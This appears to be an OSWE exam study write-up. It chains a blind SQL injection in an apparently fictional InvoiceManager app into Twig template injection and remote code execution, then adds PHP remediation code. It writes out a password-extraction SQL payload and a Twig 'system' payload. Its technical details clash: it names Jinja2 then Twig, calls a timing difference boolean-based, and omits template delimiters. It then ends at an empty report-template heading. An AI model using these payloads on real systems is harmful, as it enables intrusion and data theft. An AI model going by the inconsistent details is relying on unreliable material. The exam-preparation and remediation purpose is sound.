Report Work Patched — Oswe Exam

Here’s a structured review of OSWE exam report work, based on common experiences from individuals who have taken the Offensive Security Web Expert (OSWE) certification.


Chain of Vulnerabilities: SQL Injection to RCE

Application Context
The target application, InvoiceManager v2.4, exposes a REST API endpoint at /api/invoice/preview. The endpoint accepts a template_id parameter, which is used to fetch a Jinja2 template from the database.

Vulnerability 1: Boolean-Based Blind SQL Injection

  • Location: api.php lines 112–124
    // user-supplied template_id is neither validated nor bound as a parameter
    $template_id = $_GET['template_id'];
    $query = "SELECT template_content FROM templates WHERE id = $template_id";
    $result = $db->query($query);

  • Impact: Direct concatenation of user input into SQL query → blind SQL injection.
  • Proof:
    Request:
    /api/invoice/preview?template_id=1 AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'
    Response: a ~2s timing difference between true and false conditions confirms character-by-character (boolean) extraction.

Vulnerability 2: Server-Side Template Injection (SSTI) via Retrieved Content

  • Location: TemplateRenderer.php line 89
    // database content is compiled as template source, not passed in as data
    return $twig->render($template_content, $context);

  • Trigger: The template_content fetched via SQLi is passed directly to Twig.
  • Bypass attempt: Twig’s sandbox blocks __construct, _self, etc. However, map, filter, and reduce allow calling arbitrary functions if a function name can be controlled.

Exploit Chain

  1. Use SQLi to extract admin password hash – not directly useful for RCE.
  2. Notice templates table has template_content and is_system_template column.
  3. Use SQLi UPDATE (if DB user has write perms) to inject a malicious Twig template:
    UPDATE templates SET template_content = ' _self.env.registerUndefinedFilterCallback("system")  _self.env.getFilter("id") ' WHERE id = 1
    
  4. Trigger the template via GET request:
    /api/invoice/preview?template_id=1
    system("id") executes → returns command output in HTTP response.

Result
Full remote code execution as www-data. From here, read /root/flag.txt.
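The fix a white-box report should recommend for both findings, as an added example that is not the report's or InvoiceManager's own code: the id is validated and bound as a parameter, and stored template content is handed to Twig as a variable rather than compiled as template source. It assumes a PDO connection in $db, Twig 3 installed via Composer, and a fixed template file templates/invoice_preview.html.twig that outputs {{ template_content }}.

```php
<?php
// Added example, not from the report or InvoiceManager.
// Assumes: $db is a PDO connection; Twig 3 via Composer;
// templates/invoice_preview.html.twig exists and prints {{ template_content }}.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Loader\FilesystemLoader;

// Finding 1: strict integer validation plus a bound parameter.
// "1 AND (SELECT ...)" or an appended UPDATE never reach MySQL as SQL.
function loadTemplateRow(PDO $db, string $rawId): ?array
{
    // Only plain digits >= 1 pass; "1 AND ...", "1;", "1.0" are rejected.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare('SELECT template_content FROM templates WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Finding 2: database content is data, never template source.
// The only template Twig compiles is the fixed file under templates/;
// the stored content is a context variable and autoescape HTML-encodes it,
// so even a row rewritten via SQL UPDATE cannot become executable template code.
function renderPreview(Environment $twig, array $row, array $context): string
{
    return $twig->render('invoice_preview.html.twig', $context + [
        'template_content' => $row['template_content'],
    ]);
}

$twig = new Environment(new FilesystemLoader(__DIR__ . '/templates'), [
    'autoescape' => 'html', // Twig's default, made explicit for the audit
]);

$row = loadTemplateRow($db, $_GET['template_id'] ?? '');
if ($row !== null) {
    // 'invoice_id' => 42 is a constructed sample context value
    echo renderPreview($twig, $row, ['invoice_id' => 42]);
}
```

Pair this with a SELECT-only database account for the web application, since step 3 of the chain above depends on the DB user holding UPDATE rights on the templates table.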


Executive Summary

[Leave blank – to fill after compromise]

Part 2: The OSWE Report Structure (7 Mandatory Sections)

OffSec expects a professional white-box audit report. Use this template:
